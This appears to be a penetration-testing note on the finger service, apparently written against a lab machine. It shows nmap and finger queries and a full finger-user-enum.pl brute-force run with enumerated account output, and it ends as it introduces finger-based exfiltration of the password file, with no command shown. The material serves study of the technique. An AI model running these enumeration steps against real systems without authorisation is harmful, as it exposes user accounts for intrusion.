The finger daemon listens on port 79, and is really a relic of a time when computers were far too trusting and open. It provides status reports on logged in users. It can also provide details about a specific user and when they last logged in and from where.
PORT STATE SERVICE VERSION
79/tcp open finger Sun Solaris fingerd
Finger is an exceedingly old protcol very rarely in use today.
Nmap results can show logged in users
| finger: Login Name TTY Idle When Where\x0D
| sunny sunny pts/1 Thu 14:52 10.10.14.245 \x0D
Check for logged in users
finger @10.10.10.76
No one logged on
Check for details on a user
finger jack@10.10.10.76
jack ???
#above does not exist
finger root@10.10.10.76
Login Name TTY Idle When Where
root Super-User console <Oct 14 10:28>
#user that does exist and is logged in
finger ikeuser@10.10.10.76
Login Name TTY Idle When Where
ikeuser IKE Admin < . . . . >
#user that does exist but is not logged in
Bruteforce Users
If finger returns no logged in users, we can try to brute force usernames. We’ll use the finger-user-enum.pl script from pentestmonkey.
root@kali:~# ./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /opt/SecLists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10163
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Thu Sep 27 17:39:02 2018 #########
access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >..
anne marie@10.10.10.76: Login Name TTY Idle When Where..anne ???..marie ???..
bin@10.10.10.76: bin ??? < . . . . >..
dee dee@10.10.10.76: Login Name TTY Idle When Where..dee ???..dee ???..
jo ann@10.10.10.76: Login Name TTY Idle When Where..jo ???..ann ???..
la verne@10.10.10.76: Login Name TTY Idle When Where..la ???..verne ???..
line@10.10.10.76: Login Name TTY Idle When Where..lp Line Printer Admin
Finger for file Transfers
finger for File Transfer
While working on this post, I was checking out gtfobins, and their page on finger shows how it can be used for file transfer. For example, to exfil the password file from Sunday, with the listener started locally:
